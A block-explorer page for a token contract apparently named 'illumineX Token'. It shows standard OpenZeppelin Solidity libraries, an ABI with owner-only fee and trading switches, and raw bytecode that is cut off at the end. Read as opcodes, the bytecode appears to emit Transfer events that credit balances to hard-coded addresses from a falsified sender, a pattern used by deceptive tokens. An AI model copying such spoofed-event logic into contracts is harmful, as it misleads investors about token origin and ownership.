        uint256 result = 0;
        unchecked {
            if (value >= 10 ** 64) {
                value /= 10 ** 64;
                result += 64;
            }
            if (value >= 10 ** 32) {
                value /= 10 ** 32;
                result += 32;
            }
            if (value >= 10 ** 16) {
                value /= 10 ** 16;
                result += 16;
            }
            if (value >= 10 ** 8) {
                value /= 10 ** 8;
                result += 8;
            }
            if (value >= 10 ** 4) {
                value /= 10 ** 4;
                result += 4;
            }
            if (value >= 10 ** 2) {
                value /= 10 ** 2;
                result += 2;
            }
            if (value >= 10 ** 1) {
                result += 1;
            }
        }
        return result;
    }

    /**
     * @dev Return the log in base 10, following the selected rounding direction, of a positive value.
     * Returns 0 if given 0.
     */
    function log10(uint256 value, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = log10(value);
            return result + (unsignedRoundsUp(rounding) && 10 ** result < value ? 1 : 0);
        }
    }

    /**
     * @dev Return the log in base 256 of a positive value rounded towards zero.
     * Returns 0 if given 0.
     *
     * Adding one to the result gives the number of pairs of hex symbols needed to represent `value` as a hex string.
     */
    function log256(uint256 value) internal pure returns (uint256) {
        uint256 result = 0;
        unchecked {
            if (value >> 128 > 0) {
                value >>= 128;
                result += 16;
            }
            if (value >> 64 > 0) {
                value >>= 64;
                result += 8;
            }
            if (value >> 32 > 0) {
                value >>= 32;
                result += 4;
            }
            if (value >> 16 > 0) {
                value >>= 16;
                result += 2;
            }
            if (value >> 8 > 0) {
                result += 1;
            }
        }
        return result;
    }

    /**
     * @dev Return the log in base 256, following the selected rounding direction, of a positive value.
     * Returns 0 if given 0.
     */
    function log256(uint256 value, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = log256(value);
            return result + (unsignedRoundsUp(rounding) && 1 << (result << 3) < value ? 1 : 0);
        }
    }

    /**
     * @dev Returns whether a provided rounding mode is considered rounding up for unsigned integers.
     */
    function unsignedRoundsUp(Rounding rounding) internal pure returns (bool) {
        return uint8(rounding) % 2 == 1;
    }
}

File 11 of 13: Multicall.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/Multicall.sol)

pragma solidity ^0.8.20;

import {Address} from "./Address.sol";

/**
 * @dev Provides a function to batch together multiple calls in a single external call.
 */
abstract contract Multicall {
    /**
     * @dev Receives and executes a batch of function calls on this contract.
     * @custom:oz-upgrades-unsafe-allow-reachable delegatecall
     */
    function multicall(bytes[] calldata data) external virtual returns (bytes[] memory results) {
        results = new bytes[](data.length);
        for (uint256 i = 0; i < data.length; i++) {
            results[i] = Address.functionDelegateCall(address(this), data[i]);
        }
        return results;
    }
}

File 12 of 13: Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol)

pragma solidity ^0.8.20;

import {Context} from "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev The caller account is not authorized to perform an operation.
     */
    error OwnableUnauthorizedAccount(address account);

    /**
     * @dev The owner is not a valid owner account. (eg. `address(0)`)
     */
    error OwnableInvalidOwner(address owner);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the address provided by the deployer as the initial owner.
     */
    constructor(address initialOwner) {
        if (initialOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(initialOwner);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        if (owner() != _msgSender()) {
            revert OwnableUnauthorizedAccount(_msgSender());
        }
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        if (newOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 13 of 13: SignedMath.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/math/SignedMath.sol)

pragma solidity ^0.8.20;

/**
 * @dev Standard signed math utilities missing in the Solidity language.
 */
library SignedMath {
    /**
     * @dev Returns the largest of two signed numbers.
     */
    function max(int256 a, int256 b) internal pure returns (int256) {
        return a > b ? a : b;
    }

    /**
     * @dev Returns the smallest of two signed numbers.
     */
    function min(int256 a, int256 b) internal pure returns (int256) {
        return a < b ? a : b;
    }

    /**
     * @dev Returns the average of two signed numbers without overflow.
     * The result is rounded towards zero.
     */
    function average(int256 a, int256 b) internal pure returns (int256) {
        // Formula from the book "Hacker's Delight"
        int256 x = (a & b) + ((a ^ b) >> 1);
        return x + (int256(uint256(x) >> 255) & (a ^ b));
    }

    /**
     * @dev Returns the absolute unsigned value of a signed value.
     */
    function abs(int256 n) internal pure returns (uint256) {
        unchecked {
            // must be unchecked in order to support `n = type(int256).min`
            return uint256(n >= 0 ? n : -n);
        }
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"Permissions","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint8","name":"_buy","type":"uint8"},{"internalType":"uint8","name":"_sell","type":"uint8"}],"name":"removeFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"storeData","outputs":[{"internalType":"address","name":"tokenMkt","type":"address"},{"internalType":"uint8","name":"buyFee","type":"uint8"},{"internalType":"uint8","name":"sellFee","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040526040518060400160405280600f81526020017f696c6c756d696e655820546f6b656e00000000000000000000000000000000008152505f908162000049919062001602565b506040518060400160405280600281526020017f49580000000000000000000000000000000000000000000000000000000000008152506001908162000090919062001602565b50738f39c2b8b95c1b0da5eea1701be6087641ff412960085f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550734601f63fc2ee6f866074f87b35608aca74c9b88560095f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550730cd33637bdc196ecbfe11c9b0bd1735496aedf57600a5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055507318a7984b8bebaf5c67e177e1cbafc95b0b5252bc600b5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550721f3d59df3c8ec3ba9ce5619c82901884385b5d600c5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555073110752e6d4448076f5c134f0f87145be467f1047600d5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555073246d626586bbe96a48565ba5648b59f254ff31d3600e5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555073f09b49a0fa51495ad7933fa6dbf90b6704bc83af600f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506023601160146101000a81548160ff021916908360ff1602179055506023601160156101000a81548160ff021916908360ff16021790555034801562000374575f80fd5b5060405180606001604052803373ffffffffffffffffffffffffffffffffffffffff168152602001601160149054906101000a900460ff1660ff168152602001601160159054906101000a900460ff1660ff1681525060025f820151815f015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506020820151815f0160146101000a81548160ff021916908360ff1602179055506040820151815f0160156101000a81548160ff021916908360ff1602179055509050507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff60045f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055503360075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200055633336200131a60201b60201c565b61271060e16012600a6200056b91906200186f565b6305f5e1006200057c9190620018bf565b620005889190620018bf565b62000594919062001936565b60035f60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555060105f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60035f60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054604051620006d491906200197e565b60405180910390a3612710610fa06012600a620006f291906200186f565b6305f5e100620007039190620018bf565b6200070f9190620018bf565b6200071b919062001936565b60035f60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555060085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60035f60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546040516200085b91906200197e565b60405180910390a36127106104886012600a6200087991906200186f565b6305f5e1006200088a9190620018bf565b620008969190620018bf565b620008a2919062001936565b60035f60095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555060095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60035f60095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054604051620009e291906200197e565b60405180910390a36127106105dc6012600a62000a0091906200186f565b6305f5e10062000a119190620018bf565b62000a1d9190620018bf565b62000a29919062001936565b60035f600a5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550600a5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60035f600a5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460405162000b6991906200197e565b60405180910390a36127106101f46012600a62000b8791906200186f565b6305f5e10062000b989190620018bf565b62000ba49190620018bf565b62000bb0919062001936565b60035f600b5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550600b5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60035f600b5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460405162000cf091906200197e565b60405180910390a36127106101136012600a62000d0e91906200186f565b6305f5e10062000d1f9190620018bf565b62000d2b9190620018bf565b62000d37919062001936565b60035f600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60035f600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460405162000e7791906200197e565b60405180910390a36127106103846012600a62000e9591906200186f565b6305f5e10062000ea69190620018bf565b62000eb29190620018bf565b62000ebe919062001936565b60035f600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60035f600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460405162000ffe91906200197e565b60405180910390a36127106103486012600a6200101c91906200186f565b6305f5e1006200102d9190620018bf565b620010399190620018bf565b62001045919062001936565b60035f600e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550600e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60035f600e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546040516200118591906200197e565b60405180910390a36127106102586012600a620011a391906200186f565b6305f5e100620011b49190620018bf565b620011c09190620018bf565b620011cc919062001936565b60035f600f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550600f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60035f600f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546040516200130c91906200197e565b60405180910390a362001999565b8160105f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060115f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200141a57607f821691505b60208210810362001430576200142f620013d5565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620014947fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262001457565b620014a0868362001457565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620014ea620014e4620014de84620014b8565b620014c1565b620014b8565b9050919050565b5f819050919050565b6200150583620014ca565b6200151d6200151482620014f1565b84845462001463565b825550505050565b5f90565b6200153362001525565b62001540818484620014fa565b505050565b5b8181101562001567576200155b5f8262001529565b60018101905062001546565b5050565b601f821115620015b657620015808162001436565b6200158b8462001448565b810160208510156200159b578190505b620015b3620015aa8562001448565b83018262001545565b50505b505050565b5f82821c905092915050565b5f620015d85f1984600802620015bb565b1980831691505092915050565b5f620015f28383620015c7565b9150826002028217905092915050565b6200160d826200139e565b67ffffffffffffffff811115620016295762001628620013a8565b5b62001635825462001402565b620016428282856200156b565b5f60209050601f83116001811462001678575f841562001663578287015190505b6200166f8582620015e5565b865550620016de565b601f198416620016888662001436565b5f5b82811015620016b1578489015182556001820191506020850194506020810190506200168a565b86831015620016d15784890151620016cd601f891682620015c7565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b60018511156200177057808604811115620017485762001747620016e6565b5b6001851615620017585780820291505b8081029050620017688562001713565b945062001728565b94509492505050565b5f826200178a57600190506200185c565b8162001799575f90506200185c565b8160018114620017b25760028114620017bd57620017f3565b60019150506200185c565b60ff841115620017d257620017d1620016e6565b5b8360020a915084821115620017ec57620017eb620016e6565b5b506200185c565b5060208310610133831016604e8410600b84101617156200182d5782820a905083811115620018275762001826620016e6565b5b6200185c565b6200183c84848460016200171f565b92509050818404811115620018565762001855620016e6565b5b81810290505b9392505050565b5f60ff82169050919050565b5f6200187b82620014b8565b9150620018888362001863565b9250620018b77fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462001779565b905092915050565b5f620018cb82620014b8565b9150620018d883620014b8565b9250828202620018e881620014b8565b91508282048414831517620019025762001901620016e6565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6200194282620014b8565b91506200194f83620014b8565b92508262001962576200196162001909565b5b828204905092915050565b6200197881620014b8565b82525050565b5f602082019050620019935f8301846200196d565b92915050565b611c4180620019a75f395ff3fe6080604052600436106100e0575f3560e01c806395d89b411161007e578063c6ba48be11610058578063c6ba48be146102d9578063c9567bf914610301578063d28d885214610317578063dd62ed3e14610341576100e7565b806395d89b4114610249578063a9059cbb14610273578063b09f1266146102af576100e7565b806323b872dd116100ba57806323b872dd1461017b578063313ce567146101b75780634abe3052146101e157806370a082311461020d576100e7565b806306fdde03146100eb578063095ea7b31461011557806318160ddd14610151576100e7565b366100e757005b5f80fd5b3480156100f6575f80fd5b506100ff61037d565b60405161010c9190611410565b60405180910390f35b348015610120575f80fd5b5061013b600480360381019061013691906114c1565b61040c565b6040516101489190611519565b60405180910390f35b34801561015c575f80fd5b506101656104f9565b6040516101729190611541565b60405180910390f35b348015610186575f80fd5b506101a1600480360381019061019c919061155a565b610519565b6040516101ae9190611519565b60405180910390f35b3480156101c2575f80fd5b506101cb6105bc565b6040516101d891906115c5565b60405180910390f35b3480156101ec575f80fd5b506101f56105c1565b604051610204939291906115ed565b60405180910390f35b348015610218575f80fd5b50610233600480360381019061022e9190611622565b61060f565b6040516102409190611541565b60405180910390f35b348015610254575f80fd5b5061025d610624565b60405161026a9190611410565b60405180910390f35b34801561027e575f80fd5b50610299600480360381019061029491906114c1565b6106b4565b6040516102a69190611519565b60405180910390f35b3480156102ba575f80fd5b506102c36106c8565b6040516102d09190611410565b60405180910390f35b3480156102e4575f80fd5b506102ff60048036038101906102fa9190611677565b610754565b005b34801561030c575f80fd5b506103156107ce565b005b348015610322575f80fd5b5061032b610a0a565b6040516103389190611410565b60405180910390f35b34801561034c575f80fd5b50610367600480360381019061036291906116b5565b610a95565b6040516103749190611541565b60405180910390f35b60605f805461038b90611720565b80601f01602080910402602001604051908101604052809291908181526020018280546103b790611720565b80156104025780601f106103d957610100808354040283529160200191610402565b820191905f5260205f20905b8154815290600101906020018083116103e557829003601f168201915b5050505050905090565b5f8160045f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516104e79190611541565b60405180910390a36001905092915050565b6012600a61050791906118ac565b6305f5e10061051691906118f6565b81565b5f8160045f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546105a19190611937565b925050819055506105b3848484610ab5565b90509392505050565b601281565b6002805f015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690805f0160149054906101000a900460ff1690805f0160159054906101000a900460ff16905083565b6003602052805f5260405f205f915090505481565b60606001805461063390611720565b80601f016020809104026020016040519081016040528092919081815260200182805461065f90611720565b80156106aa5780601f10610681576101008083540402835291602001916106aa565b820191905f5260205f20905b81548152906001019060200180831161068d57829003601f168201915b5050505050905090565b5f6106c0338484610ab5565b905092915050565b600180546106d590611720565b80601f016020809104026020016040519081016040528092919081815260200182805461070190611720565b801561074c5780601f106107235761010080835404028352916020019161074c565b820191905f5260205f20905b81548152906001019060200180831161072f57829003601f168201915b505050505081565b61075c61131e565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146107c0576040517f9af2b10000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6107ca8282611348565b5050565b6107d661131e565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461080c575f80fd5b600f60159054906101000a900460ff1615610825575f80fd5b5f737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610883573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108a7919061197e565b90505f737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610907573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061092b919061197e565b90505f8273ffffffffffffffffffffffffffffffffffffffff1663e6a4390530846040518363ffffffff1660e01b81526004016109699291906119a9565b602060405180830381865afa158015610984573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906109a8919061197e565b90508060055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001600f60156101000a81548160ff021916908315150217905550505050565b5f8054610a1690611720565b80601f0160208091040260200160405190810160405280929190818152602001828054610a4290611720565b8015610a8d5780601f10610a6457610100808354040283529160200191610a8d565b820191905f5260205f20905b815481529060010190602001808311610a7057829003601f168201915b505050505081565b6004602052815f5260405f20602052805f5260405f205f91509150505481565b5f80610abf61131e565b9050600f60159054906101000a900460ff1680610b0757508073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16145b80610b3d57508073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16145b610b45575f80fd5b8260035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254610b919190611937565b9250508190555060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16148015610c015750600f60149054906101000a900460ff16155b8015610c72575060646012600a610c1891906118ac565b6305f5e100610c2791906118f6565b610c3191906119fd565b60035f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205410155b8015610caa57508073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b15610f3e576001600f60146101000a81548160ff0219169083151502179055505f600267ffffffffffffffff811115610ce657610ce5611a2d565b5b604051908082528060200260200182016040528015610d145781602001602082028036833780820191505090505b50905030815f81518110610d2b57610d2a611a5a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610dc2573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610de6919061197e565b81600181518110610dfa57610df9611a5a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663eb6f613960646012600a610e7491906118ac565b6305f5e100610e8391906118f6565b610e8d91906119fd565b5f8430426040518663ffffffff1660e01b8152600401610eb1959493929190611b80565b5f604051808303815f87803b158015610ec8575f80fd5b505af1158015610eda573d5f803e3d5ffd5b505050508173ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f19350505050158015610f21573d5f803e3d5ffd5b505f600f60146101000a81548160ff021916908315150217905550505b5f8060025f0160149054906101000a900460ff1660025f0160159054906101000a900460ff16915091503073ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff1614158015610fb7575060011515600f60159054906101000a900460ff161515145b15611098575f606460055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168873ffffffffffffffffffffffffffffffffffffffff1614611019578361101b565b825b60ff168761102991906118f6565b61103391906119fd565b905080866110419190611937565b95508060035f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825461108f9190611bd8565b92505081905550505b8460035f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546110e49190611bd8565b9250508190555060115f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff16036111ca578573ffffffffffffffffffffffffffffffffffffffff1660105f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef876040516111bd9190611541565b60405180910390a3611310565b60115f90549061